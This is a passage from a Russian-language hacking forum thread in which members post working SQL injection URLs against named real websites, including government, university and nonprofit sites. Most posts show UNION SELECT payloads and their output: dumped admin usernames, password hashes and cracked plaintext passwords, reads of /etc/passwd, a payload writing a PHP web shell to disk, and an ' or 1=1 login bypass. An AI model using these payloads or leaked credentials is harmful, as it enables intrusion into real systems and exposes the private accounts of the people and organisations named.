SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.contagem.mg.gov.br
    version, database, user
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,user(),database(),version())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    
    etc/passwd
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f6574632f706173737764)+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
    shell
    Code:
    http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f7068702073797374656d28245f4745545b636d645d293b203f3e+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user+into_outfile+/*
    www.zjda.gov.cn
    Code:
    http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),database(),version())/*&op=recommend
     
    #2461 banned, 10 Jun 2007
    Last edited: 10 Jun 2007
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    education.apple.com
    admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:%
     
    1 person likes this.
  3. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Code:
    http://www.toraks.org.tr/journal/text.php3?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+articles/*
    Code:
    http://www.tutak.bel.tr/index2.php?id=-2+union+select+1,2,3,concat(user,char(58),pass),5+from+user+limit+0,1/*
     
    #2463 _Pantera_, 10 Jun 2007
    Last edited: 10 Jun 2007
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Дальше лень :)
     
    1 person likes this.
  5. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Алкогольный портал Госалкогольинспекции РТ

    Code:
    http://www.tatalc.ru/index.php?page=7&idnews=-12345+union+select+1,2,3,4,5,concat(name,char(58),passwd),7,8,   9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*  
    USER: root@localhost
    DATABASE: tatalc
    VERSION: 4.0.24

    Пароли в открытом виде:)
    Администратор:N58y0Aa
     
    1 person likes this.
  6. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    http://www.stplus.ru/
    mysql 5
    admins : id_admin,login,password,name
    avk : adafff23fe27d62fa9d5220cc0b3a8ea : assassin
    a_volkov : 00a809937eddc44521da9521269e75c6 : emma
     
    1 person likes this.
  7. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Сайт какой-то певицы.

    Code:
    http://www.alesya.by/interview.php?act=intview&int=-123456+union+select+1,2,3,4,3/*
    USER: syabry@localhost
    DATABASE: syabry_xmb1
    VERSION: 4.1.21-standard


    КАРЕЛЬСКАЯ РЕГИОНАЛЬНАЯ ОБЩЕСТВЕННАЯ ПРИРОДООХРАННАЯ ОРГАНИЗАЦИЯ

    Code:
    http://spok.onego.ru/index.php?lang=en&page=show.php&id=-12345+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14+from+INFORMATION_SCHE  MA.TABLES+limit+0,1/*
    USER: [email protected]
    DATABASE: spok_office_db
    VERSION: 5.0.37
     
    3 people like this.
  8. gormet

    gormet Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    38
    Likes Received:
    24
    Reputations:
    23
    _http://www.mediaclub.kz/news.php?catid=-1+union+select+1,database(),3/*

    _http://www.db-central.de/content_manager/page.php?ID=-1+union+select+1,2,3,4,5,6,7/*
     
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www2.tccgc.gov.tw
    version(), user(), database()
    Code:
    http://www2.tccgc.gov.tw/art/community_person.php?id=-1+union+select+1,user(),database(),4,LOAD_FILE(0x2f6574632f706173737764),version(),7,8,9,10,11,12,13,14,15+from+mysql.user/*
    Сайт стоит на винде у обычного пользователя....
    Есть доступ к mysql.user
    Рутайте
     
  10. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    Камеди клаб

    http://www.rucomedy.com/

    уязвимость: http://www.rucomedy.com/search.php?showid=1&serie=90'

    -> mysql 5
    вывод без лимита, поглядел, наиболее интересные таблицы - wp_users и users

    ->таблицы и столбцы:
    wp_users
     
    3 people like this.
  11. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.rareconservation.org/news/article.php?id=-14+union+select+1,2,user(),4,concat(version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18+from+news/*
    Code:
    http://www.americanforests.org/news/display.php?id=-167+union+select+1,2,user,4,password,6,7+from+mysql.user/*
    root:*236FB56946627F45C458B3434306F66D085BAF25
    liveweb:*9A15CDAE497B891F892D82CC25C89CB34CF519CC
    adminweb:*160CC77703CF91DE69921040D35F94E46B897CB3
    conference:*7769CBE36C25AA869D42E707102C5DBB94816511


    Code:
    http://www.everson.org/news/article.php?id=-22+union+select+1,2,password,username+from+users/*
    evers0n:z5Acrour

    Code:
    http://www.glaad.org/media/resource_kit_detail.php?id=-3495+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
    Code:
    http://www.selfservice.org/article.php?id=-1887+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7/*
    имееються таблицы:newsletter/members
     
    5 people like this.
  12. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    chat.chat_admin
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password,char(58),name,char(58),email),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+chat.chat_admin/*
    onder.isik:3a90d4fe673f875337e06cf2b83051e1 - onder
    mahir.hava:307b9b5e9a0ecd6437ddd389eb1c7396 - mahir

    mysql.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),password),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user/*
    root:57eeeb520498a5cb - 123321

    kobifinans_faz3.member
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.member/*
    kobifinans_faz3.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+kobifinans_faz3.user/*
    fib_2_old.member
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.member/*
    fib_2_old.user
    Code:
    http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+fib_2_old.user/*
    _____________________

    вот еще edu, но таблицы с юзерами не существует(
    Code:
    http://www.metinberber.ktu.edu.tr/tanitim.php?id=-2+union+select+1,2,3,4,5,6/*
     
    #2472 _Pantera_, 11 Jun 2007
    Last edited: 11 Jun 2007
    2 people like this.
  13. netadmin

    netadmin New Member

    Joined:
    28 Sep 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    -4
    Nu Nashol ia SQL Error na Gruzinskam Saite Top.ge
    http://top.ge/stat_ip.php?ID='
    no ne kak ne magu vipolnit SQL comandi pamagite pajalusta
     
  14. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    щаз

    аштачецом закрыто)
     
    #2474 alextoun, 11 Jun 2007
    Last edited: 11 Jun 2007
    2 people like this.
  15. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    Натати Портман

    http://www.natalieportman.com/

    уязвимость: http://www.natalieportman.com/npcom.php?page_number=149&newsid=1904'

    -> смотрим версию, она оказывается четвертой. [email protected] : 4.1.20 : natcom (user(),version(),database())
    Пытаемся подобрать названия таблиц, но чего-то ничего не подходит, есть форум phpbb, но префикс подобрать также не удается. Зато есть доступ к таблицам базы mysql:
    admin:536b46077018e797:localhost
    -> смотрим в таблицу db, и видим, что имеются базы horde, phpmyadmin_6w2sCLlPLlk, sitebuilder3 . причем в базе sitebuilder3 удается подобрать таблицу users , и нужные к ней поля user_name, user_password, email; и находим запись
    1:admin:21232f297a57a5a743894a0e4a801fc3
    пароль очень сложный, но мы его подбираем - пароль admin ))

    идем в админку
    логин/пасс , конечно, не подходят, но зато из-за отсутствия должной фильтрации, мы без труда в неё попадаем, введя в поле логина
    ' or 1=1/* и произвольное значение в поле пароль.
     
    3 people like this.
  16. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Демократия по русски. я плакалъ -\
    Code:
    http://www.democracy.ru/article.php?id=247777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),version(),database()),16/*
    5 ветка
    Code:
    http://termini.lza.lv/article.php?id=9999999+union+select+1,concat(name,char(58),pass),concat_ws(char(58),version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
     
    2 people like this.
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Isis cмотрия антибоян.. Я уже выкладывал..)))
    Code:
    http://www.peopleandplanet.net/section.php?section=-5+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),email,5+from+user/*
    имееться мылы, может пригодиться кому либо(
     
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    А. Лукьянченко Официальный сайт Донецкого городского головы
    Code:
    http://lukyanchenko.dn.ua/view.php?id=-3187+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,table_name,9,10+from+information_schema.tables/*&cat=1&subcat=0&type=1
    Институт математики экономики и механики Одесского национального университета им. И.И.Мечникова
    Code:
    http://www.imem.odessa.ua/faculties.php?id=-2+union+select+1,passwd,name,4,5,6,email,8,9+from+users/*
    webmaster:&WЂчS/`wDvxч)Ѓжў
    [email protected]
     
    2 people like this.
  19. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Code:
    http://www.grrn.org/releases/release.php?rid=78&id=6&rhid=-2+union+select+1,2,concat(user(),version())/*
    
    Всё нашёл, подобрал, а ничё вывести не могу:
    Code:
    http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*
    http://www.lib.umich.edu/aael/news.php?newsID=-150+union+select+1/*
    
    Вот к этим не могу подобрать:
    Code:
    http://www.emiclassics.co.uk/release.php?id=-160149+union+select+1/*
    - пробовал до 102 столбца включительно(очень сломать хотелось :D ).


    Code:
    http://www.scotlandoffice.gov.uk/our-communications/release.php?id=-3565+union+select+1/*
    - до 41 включительно.
     
    #2479 Ky3bMu4, 12 Jun 2007
    Last edited: 12 Jun 2007
  20. iv.

    iv. Elder - Старейшина

    Joined:
    21 Mar 2007
    Messages:
    1,183
    Likes Received:
    438
    Reputations:
    107
    Только начал изучать sql-inj, первые две тривиальные инъекции:
    Code:
    http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*
    version: MySQL 5.0.33
    database: opticalnet
    user: root@localhost (хехе)
    Code:
    http://gsl.ru/offshore/list.phtml?cat=-1%20union%20select%201,2,3,4,5/*
    version: MySQL 4.0.24-log
    user: [email protected]
    database: tgsl
     
    3 people like this.
Thread Status:
Not open for further replies.